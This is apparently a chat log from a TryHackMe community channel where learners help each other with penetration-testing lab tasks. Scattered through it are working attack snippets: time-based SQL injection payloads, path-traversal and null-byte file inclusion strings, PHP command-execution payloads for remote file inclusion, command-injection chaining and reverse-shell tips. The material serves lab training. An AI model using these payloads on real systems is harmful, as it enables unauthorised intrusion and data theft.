||shell_exec didn't work so I went to a rev shell||

damn it I want an oscp voucher :/

That's a whole nother can of worms

Probably was. Infosec peeps don't usually know much about windows for some reason

Right?

got a fatal error

So does everyone else

How fast is normal to get through the path?

||maybe needed using the exec or system||

yikes

how could I mess this up

||<?php shell_exec("hostname"); ?>||

"What is the odd path in PATH?" linux privexec

i just dont get it

ah

don't know if there are oscp vouchers left it's not on the tickets room

Then there are none left

Someone just said the won one in #900054423588470854

VkVoTmUxTlRValpmVFVGVFZFVlNmUT09 is this text encoded with something?

Dosent look like it to me but idk

thanks, got it

Gave +1 Rep to @steel nymph

and thanks @drifting drum because you were the one writing it :)

😂😂

god bless you:))

Hello every one
I need help to the file inclusion room to Jr penetration penetest
I want a direction for task 8 Q 3

anyone solved the sql injection lab?

Yes it work thank you 👍

Gave +1 Rep to @steel nymph

Thank you bro
I have forget this 😆
their hint it was not explicit to solve it

can someone help me with here

so, you see how it took 5 seconds to respond? that means "sqli_" is part of the name of the database

yeah

I find the sqli_ part by trying one by one

😄

you just have to add letters/numbers before the % and if you get a 5second wait, that's the correct letter/number

but I cant get more of it

no other letter after the _ gave you a 5sec wait?

It needs to

but i couldnt find it

hmmm.

Can I DM you?

sure

I'm stuck on Lab3 I got the file to be displayed but in the wrong format apparently

hahahaahh

2 oscp voucher tickets.... one more pls?

Hey um if you are lets say saving the results from ffuf to a txt file you just add -o example.txt right?

u can do " | tee file.txt "

Doesn't seem like it worked 😦

I'm not sure how that works, but if can't get it to work and the results are short enough (like for Authentication Bypass) you can just create the .txt file manually

well on task two (authentication bypass) it said i needed to save the results in txt so i looked at the git and seemed like the -o command should do the job and i see the txt file but then i go to task 3 and i didnt get username/pass

i did use the copy paste command and i checked the ip so i though maybe the -o command was not right or smth

If the .txt was created and the contents of the file look correct to you than it should be all good. A lot of people were struggling with getting task 3 to work though and some found the creating the file manually fixed the issue.

well i dont know how its suppose to look but to check the contents i should use the cat command right?

Need some help on SQLi task 8, I have the schema and the table but when it comes down to column name I can’t find anything
Does my query look good,
admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'xxxxx' and TABLE_NAME='xxxxx' and COLUMN_NAME like 'a%';

It's pretty much the same as the prior example

The cat command should work, it is just suppose to store the 4 usernames that you got from task 2

It's exactly the same steps but you're using the sleep input to validate your inputs

yeah im seing like words command line bla bla all kinds of gibberish for some reason. Ill check the old messages, much love man, thanks!

Gave +1 Rep to @vagrant charm

No worries, hope you get it figured out

I am sure i got the right table but i can't get a single delay in column name

You can always search this chat to see what fixes worked for other people because as I said, this is quite a common area to have difficulties with

What is your query right now?

Yeah im looking at it right now, going to dig the old messages haha

i'll DM you my full query

Time Based SQLi is driving me insane

Look at the boolean room again. It's pretty much the same with a different method of confirming successful inputs

Ive been messing with it...at this point Im lost lol

Maybe try again another time

I probably should have kept track of what Ive tried

can someone help me? i can't come up with an easy solution

Official Vulnerabilities 101 Room Task 4 2 question:
Who is the author of Exploit-DB? i am too stupid to find the answer Y_Y

I hate my life. Got root on a box only for it to immediately go down :(

Owner of OSCP exam 🙂

I have it thanks 😄 ❤️

Gave +1 Rep to @winter perch

Guys I cant find the flags on task 3 (view page source)

anyone can help

Which room?

Introduction to web hacking, Walking on application, task3

The answer is in the text, if I do not find something I read it again slowly very carefully ^^

hello guys, my friend never played ctf, if he create an account and do the path of ticket event and give much luck to win the OSCP is valid?, do not want him to waste his time

Bro the OSCP vouchers are gone by now lol

really ?

omg

:9

OSCP Voucher
Worth $1000 Each
0/2 Claimed 🤔

it has to be updated manually so more than likely that is not accurate

does anyone already have eJPT vouchers? i have 2 flagen i am only missing one X-X

ah k

Yea. Really good chance that everything has been claimed already

if it should be so then no chances for the noobs haha

Yep pretty much

and if not then i hope i get my 3 ticket

Probably shouldn't be doing OSCP anytime soon in that case anyways lol

i got my 2 ticket yesterday at 1 or 2 in the morning

if the price would no longer exist i think yes i would not have gotten it

yes i thought so too but if you need it you save money

Yeah same and then I realized the more savvy folk already sniped em

can any help me i'm at SSRF example task2

You're gonna need to give more info than that

Can a mod like, pin this to the channel or something? I feel like I have ti say this every time someone asks for help 🙃

ooohkkk

@drifting drum ||sometimes just hiding in plain sight ||

Can someone help me ? Please SSRF ROOM Task 2

What user is this application running as? (OS Command Injection). Need help to find this

||check level 4 and try to get the pattern from there||

Sure sir, I try it

No sir, I didn't get it

Did u get it?

i too stuck in there

No Sir, I didn't get it

anyone?

I am also waiting for help

I'm trying to get the flag2 for the playground lab using the admin cookie but need help on additional cmds---got it 🤘

Netsec challenge at Port 8080 not working... Can anybody tell me what j am missing🤔 I tried stealth scan with t5

What are the contents of the flag located in /home/tryhackme/flag.txt? (Command Injection). Need help to find this

ever heard of cat?

file inclusion task 8 flag 1 and 3 help needed please

Yes Sir, I used that but not working

Flag 1 use post and curl burp seem to have issues

i am trying to connect telnet i am getting this error need help please.

It was strange for me too... So I got the flag from browser 😅😅 I am curious... Why was flag.thm not viewable in terminal...

any help on sqli task 8?
I'm on level 4 trying to run the command the give however it doesn't sleep.

||referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--||

Have you read the challenge? It explains about when it will sleep and when it won't. This is sqli manual enumeration. It will take lots of tries to name full names and columns

I started guessing like half of the alphabet but then saw this example so thought it's starting with u

It was a nice challenge... Repeat the Boolean task... With sleep... I coded a python script for this challenge

ok I got it tnx

yeah I got that

Ngl, I am not a noob... But there's a ton lot of shit I learnt from this path 💯💯💯🔥🔥

btw how do I get the subscriber role?

Subscribe to thm on site... The bot updates ur role here

I am subscribed

and my levels haven't updated

Run the discord bot verification again

It will update

cool

Can anybody help me with net sec challenge 8080 it seems buggy it's not running😭😭 even on attackbox.been on this for like an hour now

.

What are you running on that port?

Nmap

What command are you running exactly?

sudo nmap -sS -T5 -vv ip

One issue here is that you are running with T5 which can miss ports because it is running too fast. try :

nmap -sC -sV {IP} (This will run on top 1000ports and use default scripts and enumerate versions)

Then try with -p- (This will do all ports {WILL TAKE TIME})

Ye, like Cyber said, it's better to use -T4.

Ok I'll look into it 💯

It's showing 100% detected🤔

Oh you are doing that part

Yess

get remove -vv and -T5

Speed = more noise

Now it's 70%

84

Are you just running -sS?

The scan should only run for 1-2 seconds

^

Now added

Only add that flag

Lol back to 100%

Command: nmap -sS ip

I even used --scanflags option... It got no change

How long is your scan taking to run and are you resetting the tester?

13.35 seconds

Yes

This is the capstone one right? I'm going to boot it up

Yess

Thx so much 💯

Getting the flag by hacking the course code and using cyberchef to decode the base64 is technically not cheating as it its still a leart hack right? hahaha

https://tenor.com/view/hacker-hackerman-kung-fury-gif-7953536

Guys any help with lfi task 8

Im stuck in here

I tried burp to modify request but nothing happend

hello need some help
on xss task 8
i dont know what to do

Gonna need more info than that

i have started nc listner
and created 1 ticket as shown in guide
but i downt know how to send request to Request Catcher

You send the ticket to request catcher by supplying the IP of the catcher. However, since you have netcat setup, why not send the request to netcat on that host you are (assuming it's the attackbox)?

are ONE and TWO but different ways of doing it?
i am not using attackbox i am connected with vpn
so should i pass ip of Request Catcher ?

Guys , iam literally pulling my hair off because of this shitty task, i've tried every single technique with cronjobs (I've never faced problem while doing other machines with cronjobs) So what's wrong ?

Q.1 Yes
Q.2 You can just use your tun0 address (That is your IP on the THM network)

Q.2 You can just use your tun0 address (That is your IP on the THM network)

i have passed my tun0 ip with my listning port but noting is happening

What isn't working? Is it not executing your script? I haven't done this yet but it seems straight forward, in that I might be able to see what you are doing wrong.

Are you catching on the port that you are specifying in the request to connect to? (you must supply a port and not just an IP)

I know it is straight forward, i've edited the script which is located at |/home/karen| to a simple reverse shell, and open a listener on my machine for nearly 10 mins but nothing appears

How often does the cron job run?

yes
my nc: nc -nlvp 8888
my req url:http://{myTUN0ip}:8888

1 min

Perhaps there is a permissions issue. Is the script executable?

Can you ping the machine? (want to check connectivity)

If nothing works, try the attackbox

First it was not (i've never made it executable though) then i thought of making it executable but nothing works, people in the forum post suffers form the same problem

I'll give it one last try

yes

for Request Catcher i just need to pass ip without port?

thanks letme try

Gave +1 Rep to @fleet horizon

Guys please help me on fileinc task8 please

Im stuck on flag2

Stuck on fileinc as a whole

been trying anything I can think of

any hints would be appreciated

Im stuck on last task

Dm if I'm any of use

Im stuck on forth if you could help

4th one is easy
follow task 6 for last one

I got the output, just don't know how to do the answer

pretty sure i worked it out

got it :)

Hi

I ma stuck at file inclusion task 4 questions 1

I can read the file

But I can't get the url format to answer

|| Developer tools will help ||

Hint in that box

The question is lab#1 try to read /etc/passwd .what would the request url be

I can't figure out the url

Look in the spoiler I gave you

Gives the hint on the way I atleast got the request url

Probably a better way from other people

@modest arch Have you managed to work it out

Nope

I can read the file

Have you read the hint I gave to you

Ya

Dms

Still ah issue with Cross-site Scripting Practical Example (Blind XSS) task 8 as i am getting nothing from the cookies and been on it for about 90 minutes now 😦

use the script shown in the task, and make the backup file executable and wait.

What did you try so far?

File Inclusion room. Task 8 for flag3.

Somebody just give a hint.

a hint would be very helpful.

@wicked fulcrum just try another http method that start with P 🙂

alright. I will try that,.

Does anyone know why File inclusion Challenge 1|| only works with curl? I've tried everything else and can't figure out why it only work like that.||

If it doesn't works try a tricks you seen in task 5 ||%||

hey it worked. Thanks @distant mica 😁😁

Gave +1 Rep to @distant mica

Can i get a hint for task 8 in File Inclusion

You can use dev tool in your browser then in network tab just right click on your request to edit it and change the HTTP method

Which step ?

First one

Kinda confused on how to start

There a hint on the page 😄 : You need to send POST request with file parameter!

so use curl

yes I think it's the simple way

Hi,
in the room Walking An Application, when i visit the URL : https://LAB_WEB_URL.p.thmlabs.com.
I've this error : 504 Gateway Time-out

I don't understand why. I already managed to go to the site but I turned off the box without doing so on purpose.

You have to start machine

First, the Attack Box, then the machine ?

If you don't use a vpn go with attack box and then machine yes

ok thanks

I feel stupid for not being able to do these challanges

Gonna take a break and come back with a fresh mind to see if that helps

do u think the ejpt is good?

No, have you seen any jobs requiring it?

That doesn't mean it's not good. It's a solid cert if you have no foundations in pentesting. You don't have to get the cert itself (you can if you have $200 spare though). There is some things that are outdated but combining that course with Tryhackme, HTB and other learning sites, should allow you to go for something more useful like the eCPPT or OSCP

^

thanks attackBox worked

Gave +1 Rep to @fleet horizon

Hey all, heads up I'm kind of a noob and doing the Remote File Inclusion lab on Jr Pentest path and I'm trying to serve up a simple Python3 http.server but for some reason it's stuck on "Serving HTTP on 0.0.0.0 port 9001 ..." any advice? Looking on the internet and it seems like I may need to port forward on my router?

That means that it is hosting the server correctly... You will now use wget or curl on your target to download the file. You will be able to download any file that is in the directory you are hosting the webserver at

okay, thanks, I suppose my next question is which IP is my server taking then?

Gave +1 Rep to @fleet horizon

your THM IP. so you would run:

curl http://{IP_OFMACHINE_}:{PORT}/{FILE_TO_DOWNLOAD} -o FILE_NAME.ext

Same command with wget

Much appreciated, I think I was using the wrong IP in my command then! I'll try that

anybody completed file inclusion room?

I need help badly

@prime sundial still typing

I am stuck in task 5 first question

I could access /etc/passwd but the answer I put for the response shows wrong

/lab3.languages../../../../../etc/passwd%00

this is what I tried

if you check, its not languages, u have different one

try to put other numbers and check how ur url should be

it should the ?file in it

well I did this to match the answer format

?file=languages/../../../../../etc/passwd%00

Lemme try sth ....I will reach u again if I can't still answer

thanks, actually I'm not sure if I want the certs for a job but mainly for intrest

Gave +1 Rep to @fleet horizon

I was thinking about maybe oscp

I thought my server was on my host IP and forgot I was in a VPN 🙃 hopefully this serves as a good reminder for everyone to check their ifconfig and tun0 address when you're setting up a listener and not just assume you're listening on your host's IP

It's the one in demand and will get you passed the gate keepers. I.E. HR

Hahahahhaa. That would do it

not sure if the job is my main goal since I am a developer in security company

I start to investigate other fields that are not software engineering

If you decide to go that route, make sure you can put a lot of time it. It's definitely no joke and will take lots of time to study for it. Utilise the resources that are out there and you should be able to do it. If you are completely new, I would recommend 90days

I have background from the university about netowrking and os (and from my job) and yea I've done some thm in the past

thats why for now I got this paths

anybody could give a nudge for LFI Chall3 please ? ||I absolutely tried almost all kinds of characters escape but couldn't get any single / or even a number||

trying if this is really fits for me

I would jump into that so instead. Would help in terms of interviews

yea def

I read that the oscp is like entry that you need to have

can i DM you ?

however I haven't find anything after (well maybe CRTO) for red teaming but not a solid like oscp

If your just seeing if you like the field of red team, stick with TryHackMe and at somepoint try HackTheBox, you can always get OSCP when or if you feel it would help

Am I the only one having an issue with the last flag in Walking an Application?

or am i missing something

doesn't seem to accept it

oh nvm i missed something

anyone can help with LFI challenges?

yeah, im reviewing other people's hints, challenge 2, im trying to change cookie value other than admin, like ../../../etc/flag2

but im not sure if its the real path, or what is the directory i have to look for?

ok

let me try again more

The certs from INE are OK, the certs from TCM are very good, but if you try to use them for gainful employment I think your money and time could be better spent elsewhere

i changed in developers mode METHOD to POST and put IP/challenges/chall1.php?file=../../../../etc/flag1

still seems not working

am i missing smth? i tried with burp, but didnt work aswell

Are you working with lab 1 or lab 2

omg sqlinjection task 8 took me forever haha

is that a question? if it is, its lab1

@steel nymph am still stuck : |

then what should be there

Hey! Has anyone completed the SQL Injection Room?

yeah I just did after 50 hours

lol

FINALLY DID IT

Need some help with the same, Should I DM you?

CAN'T THANK YOU ENOUGH @steel nymph

Gave +1 Rep to @steel nymph

just ask here 🙂 its late for me, so if I fall asleep others may help out

i've the same problem and i take away the curly braces, but it doesn't work

You are close, the post in form and the uri in box

yes I think so, it puts me on an endless list of words

has anyone found a work around for the net sec ids bypass thing?

it stays on 0% but nothing happens

I've run a variety of scans..attackbox and local..

this

when it's over 0%?

like...naturally? or because of scans?

wow

thanks @steel nymph it worked

Gave +1 Rep to @steel nymph

refreshing seems to have made all the difference

the command is :

user@machine$ ffuf -w 
/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

I've been flipping out because it wasn't working up til now

but now it registered 1% (lmao) and then I ran a scan

and right away got flag

😮

same..I was running everything..then everything f..then everything ff...and I thought how much more sneaky can I go for something intended to be a 5m exercise?

i restart the machine, I must have made a mistake somewhere

I am stuck with the SQL Injection room. They payload provided in the lab is also not working.

is this early on bc I had a similar issue

i lost the url of the site acmeitsupport ><

as i remember it was .thm

i find it

guys i did post request with curl, still nothing, am i missing?/spoiler curl "http://10.10.236.253/challenges/chall1.php?file=" -X POST

with dev tools, change form to post, and put uri in box, hit include

Oh cool, thanks Iassi was wondering how to do that, saves a google search

Gave +1 Rep to @steel nymph

Guys i need help with ssrf task 2

I cant figure the payload

Please help

for winPriEsc:Unquoted Service Path Lab : to search i am using "findstr /si THM flag*.txt" but its not revealing any file name... any help...

from c:\

Hello. I'm a little confused.
Which TCP ping scan does not require a privileged account? Is a SYN, ACK and what?

can i dm you?

You cannot copy paste that command in task 8, you have to go back to task 7 and use the info there :) it will work, its not broken

😉 i am on it...

I am doing the cross site scripting task 3 Where in an URL is a good place to test for reflected XSS? I have tried a few different answers. I feel like this should be obvious but im not getting it. help?

Thanks. I'll take a look now

Gave +1 Rep to @steel nymph

have it now... thanks...

its part of the url after the '?'

Got it, thanks

Gave +1 Rep to @dull turtle

No way. I can't understand the format of the response.. Expected -PS or SYN. And everything is wrong... May i ask you for help?

which one

1 or 3?\

give me some time to try

-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes. In the documentation, these are all ping options. I don't see a four-character one among them..

Nmap Host Discovery Using TCP and UDP

in Nmap Live Host Discovery

I was using burp suite for getting flag1 from task8 of inclusion room

And this is how my input looks:

POST /challenges/chall1.php?file=/etc/flag1 HTTP/1.1

Host: 10.10.147.130

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://10.10.147.130/challenges/chall1.php

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1

omg. im so stupid

so after forwarding why am I not getting the flag?

This is a language barrier... Thank you for responding and not passing by my request. 😀

Gave +1 Rep to @steel nymph

can anyone help me?

@hard jungle u there?

damn

has the site for the last task in XSS bugged out?

Can I get a hint on how to start going about question 1 Task 8 in File Inclusion

thanks

Gave +1 Rep to @steel nymph

where are you stuck> If you read the other tasks, its all in there

Gonna read task 6 and 7 again to see if that helps any

Yo, I can not get my head around the SSRF room. Anybody mind giving me the example string in task two so I can have an example of how the request is parsed?

I couldn't get this to work with Burp, so I used Dev tools

Linux PrivEsc - 'what linux is this?' wow I cant find what i need in the required format. Any tips please?

hey hi i'm looking for help for the FILE inclusion challenge

marvellous, permission denied

can anyone help me
In task 6
https://tryhackme.com/room/winprivesc

i'm stuck in the second e third challenge

i can help you

can i dm you @steel nymph

thank you!

Gave +1 Rep to @steel nymph

hey guys im stuck at LFI lab, im pretty sure my request is correct but am not getting the right response

What question

and for the rce task on file inclusion, I got a python webserver up, with the file im trying to reach on it, but it cant connect

first one its not working

the server doesnt give any responses

For task 4 right

for task 8 the challenge

What question

try dev tools to modify to POST

^

am using burp

Hi. Do you have problem with flag1-3?

can i pm someone

@marsh agate Can you give me a hint for the challenge rce one

I got the file and a python webserver up

But I can't get the response on the site what i need

no errors on the my python server

just on the playgrounds site

tried nulling it at the end aswell

are you on a VPN or using a THM box

thm box

for rce, the point is u put ur server's file into url parameter, to make it read ur file

That's what im trying

what do u host in ur directory of server runnning?

what file

I have it running in home, and have cmd.txt as the payload

Through playground site, I enter the webserver of the payload and its directory

But i just get can't connect to webserver, failed to open stream and cant open cmd.txt

OH

i've been doing 0.0.0.0

I downloaded the reverse shell, uploaded it to the machine and accessed it using nc. And then I entered any commands on this server.

that explains it

I'm sorry, I have to leave.

It's fine

Can someone link me to a reverse shell for the playground please? DM me or just mention me here so i can see it, thank you in advance

You can fix the page's form and intercept it with Burp Suite to make sure how is the request looks like! This one should be warm up for the others. 😄

Hi!
In Windows Privesc Room, task 5 dll hijacking, I can't stop nor restart the service, also it seems that my dll can't manage to change the admin pwd, any tips?

I feel stupid for not being able to do this simple RCE

what is your payload

what's your query to the site as well

Payload: hostname
Query: http://10.10.x.x:4932/cmd.txt

your cmd.txt only has hostname in it?

it needs to be PHP code

OH

I've done that a few times already :S

Is the query right however

Did you start your HTTP server on port 4932?

yes

I did python3 -m http.server 4932

Yup

Fixed the payload and it still isn't working

aaa

||<?php echo gethostname(); ?>||

what is wrong with the payload

Okay

Anyone else have an issue on task 8 of cross-site scripting? I get the cookie and decode it, but the room doesn't accept it. Tried putting in everything and just after the =.

Wait I might know why it didnt work

In an error it says about included paths

If I add that, then go to the webserver it could work maybe

I just realised my mistake after this whole time

What was it? did it work for you?

I was using the wrong ip this whole time lmfao

I feel so stupid

did you get the shell?

You don't need a shell

dont be, practice makes perfect, better fail now, later u ll succeed

any hint on task 2 ssrf? still not working

Now time to just try get the right php function to call

use pentestmonkey's script

Could anyone give me a helping hand with LFI challenge 3? I have tried so much and im stuck. My curl request now looks like this: curl http://10.10.249.125/challenges///////chall3.php?file=../../../../etc/passwd0 is also tried to url encode it and have used different HTTP methods.

yes

copy the original url, not after u put //////

I GOT IT

I GOT THE FLAG

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Any clues?

idk where to start

Clue research how to get hostname in php

Task 6 information helps ALOT

Also lassi, has attackbox been a kinda laggy for you the last few days>

@modest arch hi, i'm stuck too

Alright

Might try use a vm then

i seem like cronjob are not working

I am on common injection task 5 practical. Do the inputs that I would do to get the user and flag go in the diagnose IT page or in a terminal session?

ok i'll try that

Thank your very much sir 😉

Gave +1 Rep to @steel nymph

will it show an output or do I need to look at the source to see the output. I have been trying some inputs and the output field has been blank

of course, thanks

Gave +1 Rep to @steel nymph

I am getting results with the example

Thanks, had some other issues, but got it figured out.

Gave +1 Rep to @steel nymph

Thanks

Gave +1 Rep to @steel nymph

Thanks @modest arch

don't I get repo

: (

thanks cyberlion, got you man

Gave +1 Rep to @smoky oyster

oh ye

lol

thanks @steel nymph for the help

Gave +1 Rep to @steel nymph

yes

lol thanks @coarse marsh

Gave +1 Rep to @coarse marsh

is there like a drop rate list for tickets ? hahahah

well, it seems like most of the rooms have had tickets claimed anyway

use this script in backup.sh and chmod +x and wait

it will work

does it have root privs??

yeah

just do it with backup

u there @modest arch

ye

antivirus will work

im here

you just need to change permissions

no output : (

Change the permissions

Have you got a web server going

of my own?

ye]

nope

Have you tried reading the file of where that information may be stored?

Spin up a python webserver

python3 -m http.server

Gave +1 Rep to @fleet horizon

If you want we can go dms where I can explain it better

ok

Incase people who read the chat don't want hints

yh lol

Hi im having trouble accessing the xssgi url that is given to me

saying there's a potential security thread and i can't proceed from there..

would anyone be okay to direct me from there

https://10.10.102.11.p.thmlabs.com

from the blind XSS practical

if i use just http(without secure), gives me a ngnix page

nginx*

You can accept the warning

i did, but gave me a 504 error

It's just because it doesn't have a valid cert

That's a server error. Try rebooting the machine

@steel nymph Yup ! I'm using the attackbox

Thanks Dave! Will give it a spin!

Gave +1 Rep to @fleet horizon

am i the only one getting this

@steel nymph @modest arch Ah. only using the machine IP works. Thanks again!

YEAH! I was getting that too. The work around for that is to launch the attackbox and ssh in. This is happening on every linux privesc task.

Im doing SQL injection task 6, I was able to get the flag but it doesnt seem to be working, is this not the right flag? ||THM{SQL_INJECTION_3840}||

File Inclusion Playground had me stressed but i made it through

did it work? I had issues with this earlier today

Anyone found the username for task 8?

I can’t seem to get the first character

which room?

SQL injection

Copy paste the command you're using

Referrer=admin123’ union select sleep(5),2 from analytics where username like ‘a%’;—

Please help me. Stuck on the challenge at the end of File Inclusion Capture Flag2 at /etc/flag2

http://10.10.209.196/challenges/chall2.php?inc=../../../../etc/flag2

Feel like i have tried everything but can't get it to work

u have to modify cookie

Oh

Admin123 isn't the proper reffer either

I did that part mate, its the flag i cant get to

you have to change the cookie value twice in total to get the flag

It worked to get the table name

keep modifying it. error message will point u ur next step

is that the correct url i was using then?

no

The referrer is fine. You need to look for a different db table. There is more than 1

That too lol

im so confused, the cookies is set to Admin, i thought i got that part right

try changing the cookie and read the error

u did, not still have to modify "admin"

lol im fully lost

just tried changing flag to etc/flag2

think about where else you could put a file path instead of the parameter in the URL

i see its changing the include file

Ok go it, but password doesn’t want to show…

Anything special?

What do you mean? You have to enumerate a table then a column and finally a row just like the previous question but manually

I enumerated the two Colomns

Now I’m trying to guess the admin password

But I tried all alphanumerics

You are now doing rows right?

Yes

What command are you running?

Ah same one im struggling with

Task 8

Its a fucking bitch

…. From users where username = “xxxxx” and password like ‘%’;— works

Takes 5 seconds

But anything else is instant

This is pissing me off so much 😆

That is because that payload is wrong

You need to enumerate the username first

Do you have one?

I did

Ok... have you tried all numbers too?

I didn’t write it so not to ruin it for others

Yes

0-9

Oh wait

I think I skipped one lol

what error are you currently getting?

I thought so..

It should work without issues

i started again, so changed the cookie to admin

now on the page that says This is a admin web page! Get the flag!

yep, good

now keep modifying the cookie

you're very nearly there

do i need to do anything with the url or just the cookies ?

only cookies

whaaat the heck

okay

change the cookie to something else and read the error

tried:
etc/
/etc
etc/flag2
/flag2
cat /etc/flag2

you still need to use directory traversal

someone has a hint for me in challange 3 in the LFI room

I got up to 4 digits but no more digits or alphanumeric

Is it case sensitive?

You should be able to log in now

Unless you have the wrong user

in the inclusion function i dont get rid of the .php and i tried it with the %00 and 0x00

i think so yes

Haha I’m stupid

yes when i use the GET i get in the inclusion function ectflag.php and with POST there is the .php

try to use POST method

Lol I did the same mistake yesterday 😃 I struggle with the whole ssrf module...

now u need to work on not showing .php part

im using burps repeater at the moment but not sure if this is the problem

i did with curl

@lusty bolt Got it !!! god that was stressing me out

thank you!

Nice!

How to get sqli task 8 time based flag?

no rep for me :(

thanks @lusty bolt

ok no rep for you officially

it's because you edited it

thanks @lusty bolt

Gave +1 Rep to @lusty bolt

how do you give reps ?

by thanking others

you just say thanks and ping someone or reply

I think

thanks @lusty bolt

Gave +1 Rep to @lusty bolt

boom

Gave +1 Rep to @lusty bolt

?

What to repeat?

Same as previous task?

Ok let me try

Thanks TryHackMe for putting this path up. Learnt a lot. Completed the path but didn't get lucky apart from gaining knowledge. For that I am thankful.

Yeah thanks @tiny bluff

Gave +1 Rep to @sharp knoll

anyone can help with flag2 from LFI? I already changed the cookies value but I have no clue what to do next

i must say SSRF is not my strong point that took me a while!

With some beer and time 😃

where did you stuck?

ask

I changed the cookie from guest to Admin and a green box appeared

read very carefully. 1st I thought it was Admin, you have to write admin

then catch it with Burp, and change the "Cookie" value to path

oh ok I should be able to get it now, ty 🙂

Gave +1 Rep to @ornate yarrow

Of course. You have to do another trick too. Just make error

Do you have any hint for the 3rd task too?😀

path traversal is the best way, I think

but I'm not a web app fan or File inclusion fanboy

use NullByte and ../../../../etc/flag in Burp

can anyone help me with the Cross-Site Scripting listening problem. I couldn't catch the target.

I did.

file=../../../../etc/flag3%00
tried this one?

when you change request method in Burp you'll see the line, I think

Yea. :D

same

try again, I must say. I got the code that way

🙂

Hi, on Authentication Bypass > Task 3 (Brute Force), I have the correct valid_usernames.txt file from Task 2, used the clipboard to paste the command over for accuracy, and got no output in the terminal. I also tried to >> output.txt and confirmed that it's a blank file. Same happens if I update valid_usernames.txt to 4 lines of usernames, with one on each line. Is there perhaps an issue with the command itself that I'm missing?

<?php
echo gethostname();
?>

Am i on the right track with this for the cmd.txt

Get rid of all the extra junk in your usernames file

You only want the actual usernames itself

with method 2 it worked

Just an error.🤔

try doing the same with POST request

Right, so I tried it with one username per line as I mentioned, and also tried comma-separated all on one line. It's still giving me a blank output.

Ah sorry, I thought you meant it like as shown in your screenshot

Uhh let me take a look at that room again

for me it was each username every line, as far as i remember there were 4, steve simon etc..

I did with post. :D But just an error

then try looking at where u should put ur payload in POST request

i did with curl and dev tools

For etc/flag3 is there anyway to strip the .php out when using curl?

yo is there a bug on Cross-site Scripting room? i don t get the request neither by using curl nor by using thm request catcher

look up what null bytes are

I tried %09 and .

%00

I couldn't get NC to work for the life of me, THM request worked after I restarted the machine

i see

thanks

Hmm okay, that sounds like I'm doing it right... do you happen to remember if your terminal output looked different from mine? (I'm not sure what a success vs. failure looks like for ffuf, because even when I did Task 2, it's not as if all the usernames popped up right in the terminal; I had to check the output file to figure it out)

Use the thm req.catcher

Omg I got it

as far as i remember it was just one line showing me username and password

but u can also use one command to stop and show when it ends with correct answer

@winter spade I had the same issue. If you used the output redirector (>) for your ffuf command, and put it into valid_usernames.txt you have to completely delete the file and throw the names in the file, one name on each line.

But how?😂

I sent it as a post, tried with different payloads, url encoded, etc.

I tried that a few times now, so I m pretty sure i do something wrong or the room is not working properly. It s more likely to be the first one tbh but still

anyone doing command injection ?.

I used --output success.txt with a curl POST and the -d specifying the file

Wow this worked, thank you so much!! But what is the point of outputting a file in Task 2 if the file doesn't even work 😂

Gave +1 Rep to @jolly vine

@wary osprey what is your curl? Let's see

I tried in burp

I used 3 times, but no luck

Ohhh I don't have burp.

Someone smarter than me should answer that lol. I just know it throws a bunch of junk in that file and I tried everything. Deleting the file and manually putting the names into a new one fixed it. Glad it worked for you as well 👍

hi anyone able to do command injection last task??

@wary osprey if you look up in this thread there's the curl command that you can use from your attacker code line

just following the payload cheatsheet. how do we know which is to output the flag.txt actually?

Command line

thanks @modest arch !!

Gave +1 Rep to @covert nebula

Thank u, 🙃 it works with a curl req.

Gave +1 Rep to @unreal folio

Yay! Welcome

don't get what you mean by 'what does the input do'

you mean like cat etc input?

searches the ip machine for whatever input i enter?

yup, i mean, i know they are commands.

alrighty! Thanks @steel nymph !

Gave +1 Rep to @steel nymph

I did ' | cd $HOME && ls ' managed to see some files/directories

can't seem to find the tryhackme folder . still trying to dig around

But thanks for the direction. this is fun hahahaha

Gave +1 Rep to @steel nymph

can't get the flag : (

task 5 from https://tryhackme.com/room/oscommandinjection

i did

i used |id

same payload not working for the flag : )

@steel nymph thanks it worked with curl on challange 3

Gave +1 Rep to @steel nymph

can anyone help with task 2 of the Authentication Bypass module

yes

@steel nymph

someone have a problem with protocols and server 2 task 6?

try &

@steel nymph Just a curious question, are we able to download files using command injection as well?

verbose injection for that matter

my hydra or potator didn't work

no idea

& where

holy cow that's sick.

the point is u put ur ip address and it ping it, means it automatically ping (ur input), and if u put & that means it executes ur other command too

like ls & pwd

gotcha

remove first part

did

check flag.txt, i think u missplled it

damn finally thanks

Gave +1 Rep to @deft valley

welcome!

i miss tokyo from money heist

anyone else can't get code status 200 at task 11 or it's just me? https://tryhackme.com/room/burpsuiteintruder

is the tryhackme bot down?

I tried numbers from 1-1000

not from 0? ; )

Anyone also get error 405 specified method is invalid for the Playground RFI challenge?

nope

Can I pm you?

Yes pls

Oh nvm haha

lol

can I too?

Ty!

i restart the VM, it's work now

anybody else finish a room and when you click on a ticket, it just blanks and says "tickets for this room already claimed"?

maybe you clicked too hastily

check ur ticket, they should be there

Yes just had this for File Inclusion
I don't think there's anything to do about it, as I've no idea what tickets I got

I pretty much followed the RFI example, but using gethostname() for Playground. I'm getting a 405 Error Method Not Allowed. Can someone share a hint, or what I'm doing wrong pls 🤔

how long is the hydra attack for eddie/quinn supposed to take in the netsecchallenge room?

stuck on level 4 : )

spoiler

yes?

bruh

It's pretty much the same as the previous level, you're just validating inputs differently

o my bad

thanks. i ran 2 tasks and they both have been running 20mins. tried a few other short seclist files, but didn't help

Gave +1 Rep to @steel nymph

but not gettin the flag this time around 😑

Has anyone gotten flag1 of the Capstone challenge in the Linux PrivEsc room? I have ran many exploits and none have worked. I am able to read files (I have one read exploit working) and have tried to crack hashes to be able to su to a user but still nothing(couldn't crack the hashes).

